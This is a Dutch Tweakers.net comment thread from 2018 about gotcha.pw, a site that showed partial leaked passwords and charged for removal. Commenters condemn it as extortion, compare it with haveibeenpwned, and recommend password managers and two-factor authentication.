Nu kan iedereen zomaar het email adres van iemand in gaan geven, en in de eerste beste website gaan knallen. Hopelijk voor die personen dat die wachtwoorden niet meer worden gebruikt, maar daar vrees ik voor. Elke stap die het (als ik het ook maar miniem) gemakkelijker maakt voor iemand om onrechtmatig toegang te krijgen tot een account is zeer slecht. Op deze manier wordt "hacking" beschikbaar voor iedereen die eens op de Facebook of email van zijn "vijanden" wil gaan kijken. En zowel een hacker als een niet-zo-hacker vijanden moeten geen toegang krijgen.

Verder was er veel te doen om het feit dat d0gberry enkele karakters liet zien, terwijl een enkel mailjte genoeg was om je uit de databank te laten verwijderen. Dit is gewoon puur afpersing.
Ik blijf me verbazen over de manieren die mensen bedenken om ergens een slaatje uit te slaan. Echter hoop ik dat door dit soort praktijken mensen wel serieuzer zullen omgaan met hun gebruikersnamen en wachtwoorden in de toekomst. Het gebruik van een password manager en een uniek automatisch gegenereerd wachtwoord voor elk account in samenwerking met 2-factor authentication moet gewoon een mainstream oplossing worden.
Hoe erg deze praktijk ook is, ik kan me wel vinden in de mening dat dit een van de praktijken is die mensen ook echt kan overhalen hun wachtwoorden regelmatiger te wijzigen.
Het is voor mij iig een trigger geweest mijn wachtwoorden overal te wijzigen met een generator en deze icm Apple's keychain en een versleutelde wachtwoord manager database *zonder* cloud synchronisatie op te slaan.

Ok, het is even wat meer werk, maar de noodzaak voor dit soort beschermende maatregelen zal IMHO alleen maar hoger worden.
Echter hoop ik dat door dit soort praktijken mensen wel serieuzer zullen omgaan met hun gebruikersnamen en wachtwoorden in de toekomst.
Jep. Gotcha.pw is een succes. Het artikel over die website was in BelgiŽ alleen al 200 000 keer gelezen op hln.be . Ook in veel bedrijven is de boodschap rondgestuurd met de vermelding dat het gebruik van paswoordmanagers raadzaam is. Dat is iets waar veel mensen nog niet van gehoord hebben.
Advocaat van de duivel spelen, zal eerlijk zijn.. zonder die bitcoin zut zou ik er nog voor betaald hebben ook. Ik wordt doodmoe van het punt dat je de grijze/zwarte wegen moet bewandelen om te achterhalen welke gegevens er precies zijn gelekt. Vanuit een wachtwoord kan ik redelijk herleiden waar de lek was, wat de consequenties zitten en welke extra acties ik moet doen.

Ik heb voor zo goed als elk account een ander wachtwoord, is het een flut account van een verloren website, lig ik er niet wakker van. Maar is het een site/service waar vanuit ze spam kunnen sturen of social media kunnen sturen (zoals linked in), kan ik nog acties ondernemen. Krijg de afgelopen weken al uit diverse sites en diensten login-failures of zelfs account-blokkades, maar nog steeds geen enkel idee welke gegevens ze nu precies hebben. Zelfs met die 2 letters heb je gewoon niets aan. (en al helemaal niet met die lijst van haveibeenpwned).
je kan ook de file zelf zoeken, downloaden en kijken welk wachtwoord bekend is.
4GB textfile en uitgepakt 9GB.
Hoe bedoel je? Lijkt mij niet dat die database online staat..
jawel, die d0gberry heeft enkel een public dump gedownload en daar een front-end op gebouwd, veel heisa om niks dus eigenlijk
Waar had je dan voor betaald? Dat deze ene website je (naar eigen zeggen) uit zijn database haalt?
Je weet dat dit geen effect heeft op de rest van het internet, waar meerdere sites deze gegevens al jaren in bezit hebben die dus niet hiermee verwijderd worden?
Dit is een simpele cashgrab, overigens kan je via haveibeenpwnd.com gewoon email-alerts krijgen wanneer er nieuwe registraties op jouw mail zijn, niet echt 'grijze/zwarte wegen' ;)
Lees nu eens.. Het gaat mij om de wachtwoorden, niet om usernames of email. Haveibeenpwned heeft precies dat probleem, leuk dat je melding krijgt dat je email in 1 of andere 'gevonden' lijst staat, boeit mij niet, gaat mij om welk wachtwoord, dus welke website/account/service deze gelekt heeft.

Met die 2 letters van gotcha heb ik mogelijk al 2 websites gevonden, maar met een vermoeden van nog 2 andere sites die nog geen enkele melding hebben gemaakt over een mogelijk datalek.

Stel dat ik wachtwoord kees123 zie, dat is het unieke wachtwoord van bv mijn tweakers login, heeft of t.net een probleempje of ik heb een issue op mijn pc/telefoon/whatever.

[Reactie gewijzigd door SinergyX op 12 april 2018 15:36]

Lees dan eens wat haveibeenpwnd is ;) Die geeft je prima een melding welke site/dienst het was, waarom makkelijk doen als het ook moeilijk kan...
Stel dat je haveibeenpwnd eens test, krijg je de melding 'Tweakers.net heeft je wachtwoord gelekt', wil je dan echt nog kees123 zien voor het geval het 'de andere Tweakers.net' was? :+
Echt waar?
2,844 Separate Data Breaches (unverified): In February 2018, a massive collection of almost 3,000 alleged data breaches was found online.
Anti Public Combo List (unverified): In December 2016, a huge list of email address and password pairs appeared in a "combo list" referred to as "Anti Public".
Exploit.In (unverified): In late 2016, a huge list of email address and password pairs appeared in a "combo list" referred to as "Exploit.In".

Welke site/dienst is het dan precies als jij dat blijkbaar wel weet?
En hoe zou deze nieuwe site dan magisch dat wel weten? Ze gebruiken dezelfde leaks...
Die sites 'weten' het omdat ze de eerste of een willekeurige site in die combolist laten zien...

Welke site/dienst is het dan precies als jouw site dat blijkbaar wel magisch weet van dezelfde data? ;)
Deze database is echt al jarenlang online, dit had geen nieuws moeten zijn...
Lees de materie dan een keer door...

[Reactie gewijzigd door RGAT op 12 april 2018 16:48]

Lees nu eens mijn eerste bericht nou eens..
Vanuit een wachtwoord kan ik redelijk herleiden waar de lek was, wat de consequenties zitten en welke extra acties ik moet doen.
Mij boeit de dienst niet, die kan ik namelijk zelf herleiden.
en weet je het nu al of moet iemand het voor u snel opzoeken? :-)
Duidelijk geen ethisch of moreel besef, gelijk gaan voor winstbejag. Betalen voor het verwijderen op deze ene website heeft overigens totaal geen zin aangezien de gegevens nog altijd verkrijgbaar zijn op het internet.
Onrechtmatig verkregen data verhandelen en daar ook nog eens afpersing bij gebruiken.
Dit is gewoon strafbaar. Oppakken en opsluiten.

Er moet veel meer aandacht komen voor digitale criminaliteit.
Mwah. Mensen moeten gewoon zelf eens gaan nadenken en goede wachtwoorden gaan gebruiken. Dan hoef je je ook niet te "laten" chanteren door deze club.
telenet.be domein werd al volledig verwijderd uit de lijst zie ik net.
Probleem zit hem er nogal in dat je voor elk witte wasje een account moet aanmaken die je moet linken aan je e-mail adres.
Ja, maar in 99% van de gevallen staat er ook een "paswoord vergeten?" knop ergens in de buurt.

Voor dat soort dingen ram ik gewoon iets willekeurigs op mijn toetsenbord. Ik moet het hoogstens 1 minuut later nog 1 of 2 keer reproduceren (2e keer ingeven bij het aanmaken, en dan nog 1 keer om in te loggen na de bevestingsmail of zo, zet het in notepad of iets dergelijks en je kan copy-pasten).

De volgende keer duw ik gewoon "paswoord vergeten", komt er een fijn mailtje en ik ben terug vertrokken. En mocht dat niet lukken, maak je gewoon een nieuwe account aan...
Dan kan je net zo goed die rommel wachtwoorden opslaan in een cloud doc waar je wel 2 step auth hebt. :-)
Dat heb ik ook een hele poos gedaan met name met accounts waar ik maar ťťns per jaar gebruik van maakte. Maar een password manager is toch veel handiger.
Ik moet me er eens in verdiepen dan, tot nu toe leek “niet beheren” het makkelijkste :)

Ik reageerde ook vooral op het idee “we moeten zoveel paswoorden bijhouden” (wat dan ook ineens het argument is om steeds hetzelfde te kiezen), ik hou er 3 of 4 bij en ik heb geen 2 accounts met hetzelfde paswoord.


Om te kunnen reageren moet je ingelogd zijn


Apple iPhone X Google Pixel 2 XL LG W7 Samsung Galaxy S9 Dual Sim Google Pixel 2 Far Cry 5 Microsoft Xbox One X Apple iPhone 8

Tweakers vormt samen met Tweakers Elect, Hardware.Info, Autotrack, Nationale Vacaturebank en Intermediair de Persgroep Online Services B.V. © 1998 - 2018 Hosting door True

*